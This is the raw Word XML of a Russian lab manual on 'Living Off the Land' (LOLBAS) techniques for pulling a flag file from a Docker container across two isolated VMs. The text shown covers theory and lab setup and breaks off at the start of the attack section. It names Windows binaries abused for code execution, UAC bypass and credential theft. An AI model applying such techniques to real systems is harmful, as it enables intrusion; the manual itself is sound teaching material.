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894F3" w14:textId="7CFFB387" w:rsidR="008406D9" w:rsidRPr="000840FA" w:rsidRDefault="008406D9" w:rsidP="008406D9">
      <w:pPr>
        <w:pStyle w:val="a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0FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Методическое пособие: Лабораторная работа «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Living</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000840F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0840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Off</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000840F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0840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000840F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0840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Land</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">: доступ к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-контейнеру через LOLBAS»</w:t>
      </w:r>
      <w:r w:rsidRPr="000840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000840FA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br/>
      </w:r>
      <w:r w:rsidRPr="000840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Дисциплина: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>DevSecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000840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0840FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Offensive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000840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0840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840FA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481513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F5D2FA" w14:textId="2DCDA99F" w:rsidR="000840FA" w:rsidRDefault="000840FA">
          <w:pPr>
            <w:pStyle w:val="a7"/>
          </w:pPr>
          <w:r>
            <w:t>Оглавление</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0238AB68" w14:textId="53D90090" w:rsidR="000840FA" w:rsidRDefault="000840F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02492" w:history="1">
            <w:r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1. Цели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5958" w14:textId="2B489C47" w:rsidR="000840FA" w:rsidRDefault="0008231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202493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 Теоретическая часть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_Toc240202493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3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4EB47763" w14:textId="0DFADEBF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494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2.1. Концепция LOLBAS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_Toc240202494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3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7C54E974" w14:textId="53B94781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495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2.2. Docker в Windows 10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_Toc240202495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3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608CF4D5" w14:textId="58C65D92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496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2.3. Сетевое взаимодействие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_Toc240202496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4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1A998C96" w14:textId="259CFE6C" w:rsidR="000840FA" w:rsidRDefault="0008231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202497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 Требования к оборудованию и ПО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_Toc240202497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4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0FB31DFA" w14:textId="3E0044E5" w:rsidR="000840FA" w:rsidRDefault="0008231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202498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4. Подготовка инфраструктуры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_Toc240202498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4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6591BE3C" w14:textId="5164F0BD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499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Этап 1. Настройка вложенной виртуализации в VMware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_Toc240202499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4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233BE967" w14:textId="01653FC0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500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Этап 2. Настройка сети между VM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_Toc240202500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5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4C75D395" w14:textId="7357D243" w:rsidR="000840FA" w:rsidRDefault="0008231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202501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5. Настройка Docker в VM1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_Toc240202501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5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5F42D9B0" w14:textId="34089DA8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502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Этап 3. Установка Docker Desktop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_Toc240202502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5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22A6179F" w14:textId="381108D4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503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Этап 4. Запуск контейнера с секретными данными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_Toc240202503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6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58E4EAB4" w14:textId="2C021E67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504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Этап 5. Публикация контейнера во внешнюю сеть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_Toc240202504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6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610CE137" w14:textId="6922129F" w:rsidR="000840FA" w:rsidRDefault="0008231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202505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6. Основная часть: LOLBAS-атака с VM2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_Toc240202505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7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4628F56A" w14:textId="5D207A4B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506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Этап 6. Сценарий атаки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_Toc240202506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7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2C5BB5B5" w14:textId="384FFD1E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507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Задание 6.1. Разведка с использованием LOLBAS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_Toc240202507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7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55569E32" w14:textId="6441F135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508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Задание 6.2. Загрузка данных через certutil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_Toc240202508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7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76FFBBE7" w14:textId="27889584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509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Задание 6.3. Альтернативные методы (по выбору)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_Toc240202509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8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4BD881A8" w14:textId="629D28A7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510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Задание 6.4. Кодирование и эксфильтрация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_Toc240202510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8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4BF2E3DF" w14:textId="61E79751" w:rsidR="000840FA" w:rsidRDefault="0008231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202511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7. Анализ с точки зрения Blue Team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_Toc240202511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9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401CB3AF" w14:textId="2568BCD4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512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7.1. Артефакты и события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_Toc240202512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9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282619F7" w14:textId="1802843E" w:rsidR="000840FA" w:rsidRDefault="0008231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02513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7.2. Вопросы для самопроверки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_Toc240202513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10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58BEE6F4" w14:textId="6559AC97" w:rsidR="000840FA" w:rsidRDefault="0008231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202514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8. Контрольные вопросы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_Toc240202514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10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2EAF10C2" w14:textId="42FA763A" w:rsidR="000840FA" w:rsidRDefault="0008231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202515" w:history="1">
            <w:r w:rsidR="000840FA" w:rsidRPr="006F400C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 Отчётность</w:t>
            </w:r>
            <w:r w:rsidR="000840FA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000840FA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000840FA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc240202515 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000840FA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000840FA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000840FA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="000840FA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FAB9B1C" w14:textId="1D9665D7" w:rsidR="000840FA" w:rsidRDefault="000840FA">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="395B039F" w14:textId="5F8EFC97" w:rsidR="008406D9" w:rsidRPr="000840FA" w:rsidRDefault="008406D9" w:rsidP="008406D9">
      <w:pPr>
        <w:spacing w:after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B7D1862" w14:textId="77777777" w:rsidR="008406D9" w:rsidRPr="000840FA" w:rsidRDefault="008406D9" w:rsidP="008406D9">
      <w:pPr>
        <w:spacing w:after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F4CD29" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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bookmarkStart w:id="1" w:name="_Toc240202492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1. Цели работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="656F7110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 завершении лабораторной работы студент должен:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51647A" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Понимать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концепцию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Living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Off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the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Land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LotL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 классификацию LOLBAS (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LOLBins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LOLScripts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LOLLibs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70888B36" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Уметь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настраивать вложенную виртуализацию (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nested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virtualization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в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VMware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Workstation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запуска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Docker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Desktop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внутри гостевой ОС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Windows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10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151903A" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Освоить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методы сетевого взаимодействия между двумя виртуальными машинами в изолированной среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7116D36A" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Применить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LOLBAS-техники для выполнения команд, загрузки и передачи данных без использования сторонних инструментов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B97B41" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Проанализировать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с точки зрения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Blue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Team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какие артефакты и события генерируются при использовании LOLBAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA15E6" w14:textId="263335CB" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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E6F59D" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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bookmarkStart w:id="2" w:name="_Toc240202493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2. Теоретическая часть</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="156978CE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3" w:name="_Toc240202494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2.1. Концепция LOLBAS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="0A4C388D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LOLBAS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Living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Off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The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Land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Binaries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Scripts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and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Libraries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— это проект, документирующий все бинарные файлы, скрипты и библиотеки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Microsoft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которые могут быть использованы для техник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Living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Off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The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Land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922382A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Критерии отнесения к LOLBAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D16CEA" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Подписанный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Microsoft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файл (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нативный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ОС или загруженный с сайта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Microsoft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1D4C15B1" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Наличие «неожиданной» функциональности за пределами задокументированного использования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE8E220" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Функциональность, полезная для APT или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Red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Team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выполнение кода, загрузка файлов, обход UAC, кража учётных данных, обход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application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whitelisting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337894B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Ключевые категории:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249AC768" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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LOLBins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исполняемые файлы (certutil.exe, bitsadmin.exe, mshta.exe, rundll32.exe и др.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0AD5B" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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LOLScripts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— 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встроенные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скрипты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(PowerShell, VBScript, JScript)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26676E53" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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LOLLibs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DLL-библиотеки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69004010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4" w:name="_Toc240202495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2.2.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Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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в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Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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10</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="49A6A4D1" w14:textId="77341B32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Docker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Desktop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Windows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использует WSL2 (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Windows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Subsystem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Linux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в качестве бэкенда. Для запуска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Docker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Desktop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внутри виртуальной машины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VMware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требуется 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вложенная виртуализация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— </w:t>
      </w:r>
      <w:proofErr w:type="gram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включение</w:t>
      </w:r>
      <w:r w:rsidR="002C2928">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="MS Gothic" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang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расширений</w:t>
      </w:r>
      <w:proofErr w:type="gram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Intel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VT-x/EPT или AMD-V/RVI в настройках процессора виртуальной машины.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190DBB32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5" w:name="_Toc240202496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2.3. Сетевое взаимодействие</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3ED33BC4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Docker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Desktop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Windows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использует NAT-сеть, создаваемую через внутренний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vSwitch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Hyper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-V и компонент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WinNAT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Для доступа к контейнеру из внешней сети необходимо опубликовать порты с помощью флага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-p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или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--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publish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Однако в сценарии с двумя виртуальными машинами в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VMware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потребуется дополнительная настройка: проброс портов через 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netsh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interface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portproxy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или настройка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Host-Only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сети с маршрутизацией.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A8966F" w14:textId="15A3798D" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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9FFE10" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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bookmarkStart w:id="6" w:name="_Toc240202497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3. Требования к оборудованию и ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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6382"/>
      </w:tblGrid>
      <w:tr w:rsidR="000840FA" w:rsidRPr="000840FA" w14:paraId="46DC38F7" w14:textId="77777777" w:rsidTr="000840FA">
        <w:trPr>
          <w:trHeight w:val="34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26834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47C2B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Требование</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="000840FA" w14:paraId="403016AD" w14:textId="77777777" w:rsidTr="000840FA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2302E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840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Хостовая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F1406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Windows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10/11 </w:t>
            </w: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Pro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Enterprise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(64-bit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="000840FA" w14:paraId="5B9A3A2F" w14:textId="77777777" w:rsidTr="000840FA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2C54A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76494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Поддержка VT-x/EPT (</w:t>
            </w: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Intel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 или AMD-V/RVI (AMD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="000840FA" w14:paraId="3D8F6332" w14:textId="77777777" w:rsidTr="000840FA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714A9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06D56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Минимум 16 ГБ (рекомендуется 32 ГБ)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="000840FA" w14:paraId="1240F947" w14:textId="77777777" w:rsidTr="000840FA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D3ED2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840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VMware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840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Workstation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FC6F9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Версия 16+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="000840FA" w14:paraId="511AD96F" w14:textId="77777777" w:rsidTr="000840FA">
        <w:trPr>
          <w:trHeight w:val="3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7E2D3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Гостевые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594D1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Windows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10 </w:t>
            </w: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Pro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Enterprise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(2 шт.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="001A6852" w14:paraId="70737A37" w14:textId="77777777" w:rsidTr="000840FA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46A6B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Дополнительно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349D0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Docker Desktop </w:t>
            </w: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для</w:t>
            </w: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Windows, WSL2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19247F07" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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Важно</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
      <w:proofErr w:type="gram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хостовой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машине необходимо полностью отключить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Hyper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-V, так как он конфликтует с вложенной виртуализацией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VMware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83C01F4" w14:textId="45304BD2" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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B167B8E" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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bookmarkStart w:id="7" w:name="_Toc240202498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lastRenderedPageBreak/>
        <w:t>4. Подготовка инфраструктуры</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="588ED9DD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8" w:name="_Toc240202499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Этап 1. Настройка вложенной виртуализации в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VMware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B48E70C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1.1.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Выключите виртуальную машину VM1 (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Windows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10).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D4A98D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1.2.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Откройте настройки VM1 → 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Processors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→ в блоке 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Virtualization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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engine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установите галочку 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Virtualize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Intel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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VT-x/EPT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or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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AMD-V/RVI(V)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779592C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1.3.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Повторите для VM2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255EA362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1.4.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 хосте откройте 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Панель управления → Программы → Включение или отключение компонентов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Windows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Убедитесь, что следующие компоненты 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отключены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3AAEBB7F" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Windows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Hypervisor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Platform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C5BC942" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Windows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Subsystem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Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4844C5D0" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Virtual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Machine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Platform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1165986E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9" w:name="_Toc240202500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Этап 2. Настройка сети между VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="01955B9A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2.1.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VMware Workstation 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откройте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Edit → Virtual Network Editor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59E7D9CB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2.2.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Создайте новую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Host-Only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сеть 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VMnet2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 следующими параметрами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B1917" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Subnet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IP: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192.168.100.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1E4C38" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Subnet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Mask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255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185EB10D" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Снимите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галочку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«Use local DHCP service»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BAF5C0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2.3.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настройках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VM1 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VM2 → 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Network Adapter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Custom: VMnet2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367278CE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2.4.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Внутри VM1 настройте статический IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60913733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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DFF7A7E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netsh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interface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ip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set address "Ethernet0" static 192.168.100.10 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0AFAE2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2.5.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Внутри VM2 настройте статический IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79477209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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44EEBD7A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netsh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interface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ip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set address "Ethernet0" static 192.168.100.20 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7D50E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2.6.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Проверьте связность:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5247E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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66B5EEA1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gram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::</w:t>
      </w:r>
      <w:proofErr w:type="gram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На VM2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E096C1" w14:textId="046C2E13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ping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192.168.100.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20040F81" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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bookmarkStart w:id="10" w:name="_Toc240202501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5. Настройка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Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 в VM1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="56D393D8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11" w:name="_Toc240202502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 xml:space="preserve">Этап 3. Установка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Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Desktop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DDB96FE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3.1.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В VM1 установите WSL2. Откройте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PowerShell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 имени администратора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3C3C59BA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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="724B0B09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wsl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--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install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F349A3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3.2.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Перезагрузите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VM1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675CC54F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3.3.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Скачайте и установите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Docker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Desktop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официального сайта. При установке отметьте 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Use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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WSL 2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based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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engine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D0A5265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3.4.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После установки запустите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Docker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Desktop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дождитесь, пока статус сменится на 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Running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007DFB5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12" w:name="_Toc240202503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Этап 4. Запуск контейнера с секретными данными</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="091DF5B4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4.1.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В VM1 откройте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PowerShell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создайте контейнер на базе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nginx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5D67B0C9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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DF60A46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docker run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d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--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name secret-container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p 8080:80 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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nginx:alpine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="12F517EB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4.2.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Поместите «секретный» файл внутрь контейнера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA348D8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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="162E6255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docker exec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it secret-container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sh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c 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"echo 'FLAG{LOLBAS_MASTER_2025}' &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/html/secret.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7F24E2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4.3.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Проверьте доступность изнутри VM1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6A8F4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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E7C4A9E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curl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exe http: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//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localhost:8080/secret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txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31476F28" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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FLAG{LOLBAS_MASTER_2025}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8030C5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13" w:name="_Toc240202504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Этап 5. Публикация контейнера во внешнюю сеть</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="7CDBA3DE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Docker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Desktop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 умолчанию публикует порты только на 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localhost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Для доступа из VM2 необходимо настроить проброс портов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112A8598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5.1.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VM1 узнайте IP-адрес WSL2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753DB22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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="570A62B2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wsl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hostname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-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I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44791B1C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Запишите полученный IP (например,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172.23.176.1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7511CFD8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5.2.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Настройте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portproxy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через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netsh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475F8708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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36CC1799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>netsh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interface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portproxy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add v4tov4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listenaddress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=192.168.100.10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listenport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=8080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connectaddress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=172.23.176.1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connectport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=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB20C51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5.3.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Добавьте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правило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брандмауэра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14:paraId="1F8F610F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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A8B49EC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netsh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advfirewall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firewall add rule name="Docker-Proxy-8080"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dir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=in action=allow protocol=TCP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localport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=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9FDBE5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5.4.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Проверьте с VM2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC3AF05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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D1E0996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curl.exe http://192.168.100.10:8080/secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462B73B" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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Примечание: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если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curl.exe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недоступен, используйте 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powershell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-c "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Invoke-WebRequest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-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Uri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http://192.168.100.10:8080/secret.txt"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A1C1019" w14:textId="68D9849D" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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A27BBB" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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bookmarkStart w:id="14" w:name="_Toc240202505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6. Основная часть: LOLBAS-атака с VM2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="417176F2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15" w:name="_Toc240202506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Этап 6. Сценарий атаки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="38ECFCBA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Легенда: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VM2 скомпрометирована. Злоумышленник имеет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низкопривилегированный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доступ к командной строке. Задача — извлечь данные из контейнера на VM1, используя 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только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легитимные бинарные файлы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Windows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6A84B1A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16" w:name="_Toc240202507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6.1. Разведка с использованием LOLBAS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
